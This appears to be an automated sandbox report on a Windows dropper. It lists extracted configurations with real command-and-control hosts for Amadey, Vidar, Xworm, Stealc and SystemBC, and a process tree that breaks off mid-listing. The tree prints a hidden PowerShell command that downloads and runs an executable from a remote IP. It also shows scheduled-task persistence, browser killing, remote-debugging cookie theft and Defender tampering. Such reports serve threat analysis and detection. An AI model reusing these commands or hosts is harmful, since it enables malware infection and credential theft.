Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    19-02-2025 06:02

General

  • Target

    efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe

  • Size

    2.0MB

  • MD5

    41bfbce19932e1a75259a03ba23bdd33

  • SHA1

    af829594dc191d8dc5f0bcdde496d1b98130d754

  • SHA256

    efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989

  • SHA512

    cd22466d28e428f54be72326d3475065711d64e637d03a1c043e66591cd6508b8a88ba1e1fb0b34b48275b6cd5e8ad17346ad032a77d2c87e44fd129e4ff538d

  • SSDEEP

    49152:dOcb9F16Y7tPT0JCy0wzbtpFfUrSv/YVNNHAqo:koV7t70JCyCuv/uBo

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:7000

Mutex

0HzpJoisb4u9PgIO

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 25 IoCs
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 24 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 38 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 39 IoCs
  • Identifies Wine through registry keys 2 TTPs 19 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 16 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe
    "C:\Users\Admin\AppData\Local\Temp\efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
        "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2912
        • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2804
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 556
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2940
      • C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe
        "C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1076
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 240
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2572
      • C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe
        "C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1876
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1876 -s 800
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1652
      • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
        "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1572
        • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
          "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2044
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            5⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:1664
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2b29758,0x7fef2b29768,0x7fef2b29778
              6⤵
                PID:2488
              • C:\Windows\system32\ctfmon.exe
                ctfmon.exe
                6⤵
                  PID:2384
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:2
                  6⤵
                    PID:2220
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:8
                    6⤵
                      PID:1300
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1632 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:8
                      6⤵
                        PID:1984
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2340 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:2904
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2356 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:2932
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:2
                        6⤵
                          PID:1180
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2520 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:2
                          6⤵
                            PID:2340
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1456 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:1
                            6⤵
                            • Uses browser remote debugging
                            PID:1188
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3500 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:8
                            6⤵
                              PID:2516
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3612 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:8
                              6⤵
                                PID:1064
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4056 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:8
                                6⤵
                                  PID:2580
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ba168" & exit
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:896
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 10
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  • Delays execution with timeout.exe
                                  PID:1032
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 564
                              4⤵
                              • Loads dropped DLL
                              • Program crash
                              PID:2800
                          • C:\Users\Admin\AppData\Local\Temp\1085139001\C3hYpvm.exe
                            "C:\Users\Admin\AppData\Local\Temp\1085139001\C3hYpvm.exe"
                            3⤵
                            • Drops startup file
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:2232
                          • C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe
                            "C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Drops file in Windows directory
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2012
                          • C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe
                            "C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Blocklisted process makes network request
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1016
                          • C:\Users\Admin\AppData\Local\Temp\1086907001\amnew.exe
                            "C:\Users\Admin\AppData\Local\Temp\1086907001\amnew.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of FindShellTrayWindow
                            PID:2516
                            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                              "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                              4⤵
                              • Downloads MZ/PE file
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              • System Location Discovery: System Language Discovery
                              PID:1864
                              • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:1076
                                • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2896
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 556
                                  6⤵
                                  • Loads dropped DLL
                                  • Program crash
                                  PID:536
                              • C:\Users\Admin\AppData\Local\Temp\10008220101\a9c940aa2d.exe
                                "C:\Users\Admin\AppData\Local\Temp\10008220101\a9c940aa2d.exe"
                                5⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:3360
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM firefox.exe /T
                                  6⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3400
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM chrome.exe /T
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4016
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM msedge.exe /T
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4056
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM opera.exe /T
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1144
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM brave.exe /T
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2460
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                  6⤵
                                    PID:3104
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                      7⤵
                                      • Checks processor information in registry
                                      • Modifies registry class
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:3112
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.0.147233028\812396873" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1192 -prefsLen 21028 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b409eb7a-d12b-420b-86ee-871e0919f003} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 1288 141fa558 gpu
                                        8⤵
                                          PID:3244
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.1.960542121\663901535" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21889 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b9bbebc-7d20-46d1-ae82-3441cc196f8f} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 1500 e73658 socket
                                          8⤵
                                            PID:3376
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.2.29217744\1243186553" -childID 1 -isForBrowser -prefsHandle 2204 -prefMapHandle 2036 -prefsLen 21927 -prefMapSize 233548 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ada0cc16-d7ce-41e2-b0c6-789e3ab860d4} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 2016 1abd1458 tab
                                            8⤵
                                              PID:3172
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.3.780309323\936159433" -childID 2 -isForBrowser -prefsHandle 2864 -prefMapHandle 2860 -prefsLen 26340 -prefMapSize 233548 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6aaa3384-661b-4022-a4e7-78934d269556} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 2876 1ea10e58 tab
                                              8⤵
                                                PID:3876
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.4.1931462273\245575443" -childID 3 -isForBrowser -prefsHandle 3832 -prefMapHandle 3816 -prefsLen 26399 -prefMapSize 233548 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0abf98b-b688-4e85-a34e-ccb53dac0141} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 3840 205bf558 tab
                                                8⤵
                                                  PID:3640
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.5.1011211546\1454643586" -childID 4 -isForBrowser -prefsHandle 3960 -prefMapHandle 3964 -prefsLen 26399 -prefMapSize 233548 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {facef2b8-dd38-4602-beda-2721a11c7784} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 3948 20bd3458 tab
                                                  8⤵
                                                    PID:3700
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.6.265134265\1838742115" -childID 5 -isForBrowser -prefsHandle 4008 -prefMapHandle 4004 -prefsLen 26399 -prefMapSize 233548 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c98b6fb1-df9f-44e3-a285-e63b87c9c027} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 4020 20bd5e58 tab
                                                    8⤵
                                                      PID:3776
                                              • C:\Users\Admin\AppData\Local\Temp\10008230101\bb6617c10a.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10008230101\bb6617c10a.exe"
                                                5⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                PID:3840
                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3920
                                          • C:\Users\Admin\AppData\Local\Temp\1086933101\72426d1546.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086933101\72426d1546.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:1956
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn Tu5CCmaw283 /tr "mshta C:\Users\Admin\AppData\Local\Temp\wvOWNZAct.hta" /sc minute /mo 25 /ru "Admin" /f
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1964
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn Tu5CCmaw283 /tr "mshta C:\Users\Admin\AppData\Local\Temp\wvOWNZAct.hta" /sc minute /mo 25 /ru "Admin" /f
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2332
                                            • C:\Windows\SysWOW64\mshta.exe
                                              mshta C:\Users\Admin\AppData\Local\Temp\wvOWNZAct.hta
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Modifies Internet Explorer settings
                                              PID:548
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                                5⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Downloads MZ/PE file
                                                • Loads dropped DLL
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2808
                                                • C:\Users\Admin\AppData\Local\TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE
                                                  "C:\Users\Admin\AppData\Local\TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE"
                                                  6⤵
                                                  • Modifies Windows Defender DisableAntiSpyware settings
                                                  • Modifies Windows Defender Real-time Protection settings
                                                  • Modifies Windows Defender TamperProtection settings
                                                  • Modifies Windows Defender notification settings
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Windows security modification
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2908
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\1086934021\am_no.cmd" "
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1016
                                            • C:\Windows\SysWOW64\cmd.exe
